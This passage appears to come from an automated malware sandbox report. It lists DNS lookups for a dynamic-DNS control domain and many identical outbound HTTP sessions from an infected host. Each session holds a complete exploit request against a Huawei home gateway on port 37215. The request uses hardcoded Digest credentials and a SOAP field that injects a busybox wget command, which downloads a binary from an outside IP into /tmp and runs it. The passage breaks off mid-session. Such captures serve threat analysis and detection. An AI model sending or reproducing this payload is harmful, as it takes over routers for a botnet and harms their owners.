                                              Jun 9, 2024 16:34:42.377362013 CEST192.168.2.15134.195.4.20xa591Standard query (0)retardedclassmate.dynA (IP address)IN (0x0001)false
                                              Jun 9, 2024 16:34:47.380351067 CEST192.168.2.15134.195.4.20xa591Standard query (0)retardedclassmate.dynA (IP address)IN (0x0001)false
                                              Jun 9, 2024 16:34:52.386822939 CEST192.168.2.15134.195.4.20xa591Standard query (0)retardedclassmate.dynA (IP address)IN (0x0001)false
                                              Jun 9, 2024 16:34:57.392607927 CEST192.168.2.15134.195.4.20xa591Standard query (0)retardedclassmate.dynA (IP address)IN (0x0001)false
                                              Jun 9, 2024 16:35:02.395462990 CEST192.168.2.15134.195.4.20xa591Standard query (0)retardedclassmate.dynA (IP address)IN (0x0001)false
                                              Jun 9, 2024 16:35:08.316931963 CEST192.168.2.1591.217.137.370x2fb3Standard query (0)retardedclassmate.dynA (IP address)IN (0x0001)false
                                              Jun 9, 2024 16:35:13.323577881 CEST192.168.2.1591.217.137.370x2fb3Standard query (0)retardedclassmate.dynA (IP address)IN (0x0001)false
                                              TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
                                              Jun 9, 2024 16:33:10.428227901 CEST51.254.162.59192.168.2.150x9a2dNo error (0)retardedclassmate.dyn89.32.41.31A (IP address)IN (0x0001)false
                                              Jun 9, 2024 16:33:10.428227901 CEST51.254.162.59192.168.2.150x9a2dNo error (0)retardedclassmate.dyn37.49.229.111A (IP address)IN (0x0001)false
                                              Jun 9, 2024 16:33:12.508199930 CEST185.181.61.24192.168.2.150xe635No error (0)retardedclassmate.dyn89.32.41.31A (IP address)IN (0x0001)false
                                              Jun 9, 2024 16:33:12.508199930 CEST185.181.61.24192.168.2.150xe635No error (0)retardedclassmate.dyn37.49.229.111A (IP address)IN (0x0001)false
                                              Jun 9, 2024 16:33:12.548165083 CEST195.10.195.195192.168.2.150xaeaNo error (0)retardedclassmate.dyn37.49.229.111A (IP address)IN (0x0001)false
                                              Jun 9, 2024 16:33:12.548165083 CEST195.10.195.195192.168.2.150xaeaNo error (0)retardedclassmate.dyn89.32.41.31A (IP address)IN (0x0001)false
                                              Jun 9, 2024 16:34:03.594449997 CEST51.158.108.203192.168.2.150x69bdNo error (0)retardedclassmate.dyn37.49.229.111A (IP address)IN (0x0001)false
                                              Jun 9, 2024 16:34:03.594449997 CEST51.158.108.203192.168.2.150x69bdNo error (0)retardedclassmate.dyn89.32.41.31A (IP address)IN (0x0001)false
                                              Jun 9, 2024 16:34:04.914246082 CEST51.77.149.139192.168.2.150xa0eeNo error (0)retardedclassmate.dyn89.32.41.31A (IP address)IN (0x0001)false
                                              Jun 9, 2024 16:34:04.914246082 CEST51.77.149.139192.168.2.150xa0eeNo error (0)retardedclassmate.dyn37.49.229.111A (IP address)IN (0x0001)false
                                              Jun 9, 2024 16:34:05.019771099 CEST185.181.61.24192.168.2.150x26a5No error (0)retardedclassmate.dyn37.49.229.111A (IP address)IN (0x0001)false
                                              Jun 9, 2024 16:34:05.019771099 CEST185.181.61.24192.168.2.150x26a5No error (0)retardedclassmate.dyn89.32.41.31A (IP address)IN (0x0001)false
                                              Jun 9, 2024 16:34:05.900424957 CEST178.254.22.166192.168.2.150x39c8No error (0)retardedclassmate.dyn89.32.41.31A (IP address)IN (0x0001)false
                                              Jun 9, 2024 16:34:05.900424957 CEST178.254.22.166192.168.2.150x39c8No error (0)retardedclassmate.dyn37.49.229.111A (IP address)IN (0x0001)false
                                              Jun 9, 2024 16:34:07.890558958 CEST81.169.136.222192.168.2.150x8eb5No error (0)retardedclassmate.dyn89.32.41.31A (IP address)IN (0x0001)false
                                              Jun 9, 2024 16:34:07.890558958 CEST81.169.136.222192.168.2.150x8eb5No error (0)retardedclassmate.dyn37.49.229.111A (IP address)IN (0x0001)false
                                              Jun 9, 2024 16:34:08.085263014 CEST51.254.162.59192.168.2.150x85a2No error (0)retardedclassmate.dyn37.49.229.111A (IP address)IN (0x0001)false
                                              Jun 9, 2024 16:34:08.085263014 CEST51.254.162.59192.168.2.150x85a2No error (0)retardedclassmate.dyn89.32.41.31A (IP address)IN (0x0001)false
                                              Jun 9, 2024 16:34:16.590956926 CEST51.254.162.59192.168.2.150x3212No error (0)retardedclassmate.dyn89.32.41.31A (IP address)IN (0x0001)false
                                              Jun 9, 2024 16:34:16.590956926 CEST51.254.162.59192.168.2.150x3212No error (0)retardedclassmate.dyn37.49.229.111A (IP address)IN (0x0001)false
                                              Jun 9, 2024 16:34:16.649358988 CEST185.181.61.24192.168.2.150xd5d0No error (0)retardedclassmate.dyn37.49.229.111A (IP address)IN (0x0001)false
                                              Jun 9, 2024 16:34:16.649358988 CEST185.181.61.24192.168.2.150xd5d0No error (0)retardedclassmate.dyn89.32.41.31A (IP address)IN (0x0001)false
                                              Jun 9, 2024 16:34:25.167473078 CEST185.181.61.24192.168.2.150x626No error (0)retardedclassmate.dyn89.32.41.31A (IP address)IN (0x0001)false
                                              Jun 9, 2024 16:34:25.167473078 CEST185.181.61.24192.168.2.150x626No error (0)retardedclassmate.dyn37.49.229.111A (IP address)IN (0x0001)false
                                              Jun 9, 2024 16:34:33.665843010 CEST51.77.149.139192.168.2.150xefa6No error (0)retardedclassmate.dyn89.32.41.31A (IP address)IN (0x0001)false
                                              Jun 9, 2024 16:34:33.665843010 CEST51.77.149.139192.168.2.150xefa6No error (0)retardedclassmate.dyn37.49.229.111A (IP address)IN (0x0001)false
                                              Jun 9, 2024 16:34:42.265079021 CEST51.77.149.139192.168.2.150xf44fNo error (0)retardedclassmate.dyn89.32.41.31A (IP address)IN (0x0001)false
                                              Jun 9, 2024 16:34:42.265079021 CEST51.77.149.139192.168.2.150xf44fNo error (0)retardedclassmate.dyn37.49.229.111A (IP address)IN (0x0001)false
                                              Session IDSource IPSource PortDestination IPDestination Port
                                              0192.168.2.1558962186.122.190.5637215
                                              TimestampBytes transferredDirectionData
                                              Jun 9, 2024 16:33:11.032639027 CEST822OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                              Connection: keep-alive
                                              Accept: */*
                                              Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                              Content-Length: 453
                                              Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 38 35 2e 32 34 34 2e 33 36 2e 32 30 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d [TRUNCATED]
                                              Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 185.244.36.205 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              1192.168.2.1555010156.254.78.6337215
                                              TimestampBytes transferredDirectionData
                                              Jun 9, 2024 16:33:11.032645941 CEST822OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                              Connection: keep-alive
                                              Accept: */*
                                              Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                              Content-Length: 453
                                              Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 38 35 2e 32 34 34 2e 33 36 2e 32 30 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d [TRUNCATED]
                                              Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 185.244.36.205 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              2192.168.2.153296245.16.199.7537215
                                              TimestampBytes transferredDirectionData
                                              Jun 9, 2024 16:33:11.032650948 CEST822OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                              Connection: keep-alive
                                              Accept: */*
                                              Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                              Content-Length: 453
                                              Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 38 35 2e 32 34 34 2e 33 36 2e 32 30 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d [TRUNCATED]
                                              Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 185.244.36.205 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              3192.168.2.1533356190.115.49.15937215
                                              TimestampBytes transferredDirectionData
                                              Jun 9, 2024 16:33:11.032679081 CEST822OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                              Connection: keep-alive
                                              Accept: */*
                                              Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                              Content-Length: 453
                                              Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 38 35 2e 32 34 34 2e 33 36 2e 32 30 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d [TRUNCATED]
                                              Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 185.244.36.205 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              4192.168.2.1534060121.176.248.13237215
                                              TimestampBytes transferredDirectionData
                                              Jun 9, 2024 16:33:11.032747030 CEST822OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                              Connection: keep-alive
                                              Accept: */*
                                              Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                              Content-Length: 453
                                              Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 38 35 2e 32 34 34 2e 33 36 2e 32 30 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d [TRUNCATED]
                                              Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 185.244.36.205 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              5192.168.2.1537096197.7.11.7037215
                                              TimestampBytes transferredDirectionData
                                              Jun 9, 2024 16:33:11.032754898 CEST822OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                              Connection: keep-alive
                                              Accept: */*
                                              Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                              Content-Length: 453
                                              Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 38 35 2e 32 34 34 2e 33 36 2e 32 30 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d [TRUNCATED]
                                              Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 185.244.36.205 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              6192.168.2.155856637.50.109.16437215
                                              TimestampBytes transferredDirectionData
                                              Jun 9, 2024 16:33:11.032754898 CEST822OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                              Connection: keep-alive
                                              Accept: */*
                                              Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                              Content-Length: 453
                                              Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 38 35 2e 32 34 34 2e 33 36 2e 32 30 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d [TRUNCATED]
                                              Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 185.244.36.205 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              7192.168.2.1543904190.95.159.12737215
                                              TimestampBytes transferredDirectionData
                                              Jun 9, 2024 16:33:11.032826900 CEST822OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                              Connection: keep-alive
                                              Accept: */*
                                              Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                              Content-Length: 453
                                              Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 38 35 2e 32 34 34 2e 33 36 2e 32 30 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d [TRUNCATED]
                                              Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 185.244.36.205 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              8192.168.2.1535242172.82.150.1937215
                                              TimestampBytes transferredDirectionData
                                              Jun 9, 2024 16:33:11.032891989 CEST822OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                              Connection: keep-alive
                                              Accept: */*
                                              Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                              Content-Length: 453
